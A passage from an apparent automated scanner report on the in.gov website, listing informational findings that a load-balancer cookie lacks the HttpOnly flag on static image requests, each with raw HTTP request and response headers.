Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856; BIGipServerapps_ii_oss=4046653450.36895.0000; BIGipServerwww.IN.gov-http=1916078090.20480.0000; WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304127021784:ss=1304126855900

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:30:01 GMT
Server: Apache
Last-Modified: Mon, 07 Jun 2010 19:45:59 GMT
ETag: "11848a-8f3-48875ec02cbc0"
Accept-Ranges: bytes
Content-Length: 2291
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 01:31:01 GMT; path=/

GIF89a..<..Q............................................................................................................................................................................................
...[SNIP]...

14.314. http://in.gov/core/images/amber_alert.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/amber_alert.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/amber_alert.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:09 GMT
Server: Apache
Last-Modified: Wed, 14 Jul 2010 13:51:18 GMT
ETag: "10f4a9c-ade-48b5947b16180"
Accept-Ranges: bytes
Content-Length: 2782
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:09 GMT; path=/

GIF89aF.(........f.....)...(.....#.....e....N..t%..L.....w.....q..Q.....S.B#.....%.m............1.Y%..y........    ....o$.|K...........[.T$..n..k.....v..$..=.....v..]....TN..c........:........$..l..*....
...[SNIP]...

14.315. http://in.gov/core/images/atg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/atg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/atg.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:18 GMT
Server: Apache
Last-Modified: Fri, 30 Apr 2010 13:48:43 GMT
ETag: "118490-177e-48574805b24c0"
Accept-Ranges: bytes
Content-Length: 6014
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:18 GMT; path=/

GIF89ai._.......................lgS20..|.ri....ZR.c[.yywfg|...........39L...d[[,2D...;BW...........7>R...~y.jcd..................{a_...%*;...iA=TIH...jWgU;E.....~...ufw.ka.tp.~{eHC.............ytXXh~
...[SNIP]...

14.316. http://in.gov/core/images/bgs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/bgs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/bgs.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:26 GMT
Server: Apache
Last-Modified: Tue, 11 May 2010 18:16:59 GMT
ETag: "11847f-1d5d-486558801bcc0"
Accept-Ranges: bytes
Content-Length: 7517
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:26 GMT; path=/

GIF89aw.L.......................!G......................................................................................................................................................................
...[SNIP]...

14.317. http://in.gov/core/images/billboards/INGOV_severe_weather.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/billboards/INGOV_severe_weather.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/billboards/INGOV_severe_weather.jpg HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:11 GMT
Server: Apache
Last-Modified: Tue, 01 Mar 2011 13:02:50 GMT
ETag: "1f93ddf-d889-49d6b69dd1280"
Accept-Ranges: bytes
Content-Length: 55433
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:11 GMT; path=/

......JFIF.....d.d......Ducky.......X......Adobe.d................................................................                                        ................                                                                                                                                                                                                    ...........
...[SNIP]...

14.318. http://in.gov/core/images/billboards/INgov_DNRapp_bb.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/billboards/INgov_DNRapp_bb.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/billboards/INgov_DNRapp_bb.jpg HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:12 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 15:33:19 GMT
ETag: "10df7bd-d57b-49e36ae726dc0"
Accept-Ranges: bytes
Content-Length: 54651
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:12 GMT; path=/

......JFIF.....d.d......Ducky.......X......Adobe.d................................................................                                        ................                                                                                                                                                                                                    ...........
...[SNIP]...

14.319. http://in.gov/core/images/billboards/SOS__billboard.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/billboards/SOS__billboard.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/billboards/SOS__billboard.jpg HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:11 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 11:51:17 GMT
ETag: "125a961-cb79-49f10dca5f740"
Accept-Ranges: bytes
Content-Length: 52089
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:11 GMT; path=/

......JFIF.....d.d......Ducky.......X......Adobe.d................................................................                                        ................                                                                                                                                                                                                    ...........
...[SNIP]...

14.320. http://in.gov/core/images/billboards/ingov_inshapebb.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/billboards/ingov_inshapebb.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/billboards/ingov_inshapebb.jpg HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:11 GMT
Server: Apache
Last-Modified: Mon, 18 Apr 2011 20:34:23 GMT
ETag: "b6484c-34d89-4a137511d71c0"
Accept-Ranges: bytes
Content-Length: 216457
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:11 GMT; path=/

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

14.321. http://in.gov/core/images/billboards/ingov_tindleybb.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/billboards/ingov_tindleybb.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/billboards/ingov_tindleybb.jpg HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:11 GMT
Server: Apache
Last-Modified: Tue, 19 Apr 2011 16:27:35 GMT
ETag: "b64850-1faf5-4a147fc54abc0"
Accept-Ranges: bytes
Content-Length: 129781
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:11 GMT; path=/

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

14.322. http://in.gov/core/images/blue_pixel.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/blue_pixel.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/blue_pixel.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/core/online_services.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304126855900:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856; BIGipServerapps_ii_oss=4046653450.36895.0000; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:30:01 GMT
Server: Apache
Last-Modified: Thu, 29 Apr 2010 19:58:27 GMT
ETag: "118488-2b-485658cc8bec0"
Accept-Ranges: bytes
Content-Length: 43
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 01:31:01 GMT; path=/

GIF89a.............!.......,...........D..;

14.323. http://in.gov/core/images/calendar_icon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/calendar_icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/calendar_icon.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:29 GMT
Server: Apache
Last-Modified: Fri, 14 May 2010 21:07:04 GMT
ETag: "118481-f43-4869441cbce00"
Accept-Ranges: bytes
Content-Length: 3907
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:29 GMT; path=/

GIF89ak.k...................................................Zp...............................u..j}................C[vm........r..bv...................]r........................Wm.e{.Tj.......p..Xn..
...[SNIP]...

14.324. http://in.gov/core/images/elected_officials-icon2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/elected_officials-icon2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/elected_officials-icon2.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:18 GMT
Server: Apache
Last-Modified: Fri, 19 Nov 2010 15:28:11 GMT
ETag: "10218da-12eb-495698ddcb8c0"
Accept-Ranges: bytes
Content-Length: 4843
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:18 GMT; path=/

GIF89a1./...Wm.............H`{...t.................fy........9[|...........:Sq................................................dx.]q........-QF]xx..............2Lk.....................$@`...Rg........
...[SNIP]...

14.325. http://in.gov/core/images/faq_icon-over.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/faq_icon-over.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/faq_icon-over.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304126855900:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856; BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:32 GMT
Server: Apache
Last-Modified: Fri, 30 Apr 2010 20:58:34 GMT
ETag: "cd33f3-144b-4857a819e9280"
Accept-Ranges: bytes
Content-Length: 5195
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:32 GMT; path=/

GIF89ak.k..........fw............................Mbz.......'KE\v.......4V+Ed...Uj....................................................z..............3Li.....................=Uq........................~
...[SNIP]...

14.326. http://in.gov/core/images/faq_icon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/faq_icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/faq_icon.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:17 GMT
Server: Apache
Last-Modified: Tue, 06 Apr 2010 13:39:43 GMT
ETag: "cd33ef-143f-4839193fa65c0"
Accept-Ranges: bytes
Content-Length: 5183
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:17 GMT; path=/

GIF89ak.k.........................Qe{.........,Fd.6X.................................................................................{........9Rn...;Uq........................r.....Zl.j|..........CZv.
...[SNIP]...

14.327. http://in.gov/core/images/footer-wide.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/footer-wide.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/footer-wide.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/core/online_services.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856; BIGipServerapps_ii_oss=4046653450.36895.0000; BIGipServerwww.IN.gov-http=1916078090.20480.0000; WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304127021784:ss=1304126855900

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:30:02 GMT
Server: Apache
Last-Modified: Mon, 10 May 2010 19:51:52 GMT
ETag: "ec2bae-2b87-48642bd7ea600"
Accept-Ranges: bytes
Content-Length: 11143
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 01:31:02 GMT; path=/

GIF89a..d....KNQ..........................................,/2.................................ux{..................    .....dgj............................................................................
...[SNIP]...

14.328. http://in.gov/core/images/footer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/footer.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/footer.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:32 GMT
Server: Apache
Last-Modified: Fri, 07 May 2010 20:51:04 GMT
ETag: "4de526-2c8a-4860737afbe00"
Accept-Ranges: bytes
Content-Length: 11402
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:32 GMT; path=/

GIF89a..d...KNQ..........................................,/2.................................ux{..................    .....dgj............................................................................
...[SNIP]...

14.329. http://in.gov/core/images/go.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/go.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/go.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:31 GMT
Server: Apache
Last-Modified: Mon, 24 May 2010 14:53:12 GMT
ETag: "4de52f-311-4875833286600"
Accept-Ranges: bytes
Content-Length: 785
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:31 GMT; path=/

GIF89a.......8Z...t..Vl.............z................................r........n~....=Vs...q..j{..&K.............................gx.......dt..........t....................n...........p..ev...........
...[SNIP]...

14.330. http://in.gov/core/images/governor_daniels.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/governor_daniels.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/governor_daniels.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:18 GMT
Server: Apache
Last-Modified: Thu, 08 Jul 2010 21:05:50 GMT
ETag: "11848d-1705-48ae6a6a84780"
Accept-Ranges: bytes
Content-Length: 5893
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:18 GMT; path=/

GIF89ad._...........fg....:=.gjP01.........bBC....mo......]57......2!"......?-.8()...C23...............=..!.....}V\....M\.\lH9<..
n]b.x.{lq.y.`PW......M@K%.$...............3.>YZ{......................
...[SNIP]...

14.331. http://in.gov/core/images/highlights_bg_horiz.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/highlights_bg_horiz.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/highlights_bg_horiz.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:25 GMT
Server: Apache
Last-Modified: Fri, 07 May 2010 20:56:23 GMT
ETag: "11847c-51-486074ab34bc0"
Accept-Ranges: bytes
Content-Length: 81
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:25 GMT; path=/

GIF89a...................!.......,.........."..............k.x.H....*    .....LO@..;

14.332. http://in.gov/core/images/highlights_bg_vert.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/highlights_bg_vert.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/highlights_bg_vert.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:25 GMT
Server: Apache
Last-Modified: Mon, 19 Apr 2010 15:42:33 GMT
ETag: "11847d-14a-48498cf338c40"
Accept-Ranges: bytes
Content-Length: 330
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:25 GMT; path=/

GIF89a...................................................................h{....ey.au....g{..........dx.k~.av....j}.cw...................................................................................
...[SNIP]...

14.333. http://in.gov/core/images/highlights_bottom.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/highlights_bottom.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/highlights_bottom.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:29 GMT
Server: Apache
Last-Modified: Fri, 07 May 2010 20:56:24 GMT
ETag: "118483-28c-486074ac28e00"
Accept-Ranges: bytes
Content-Length: 652
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:29 GMT; path=/

GIF89a..
..#............................................................................................................................................................................................
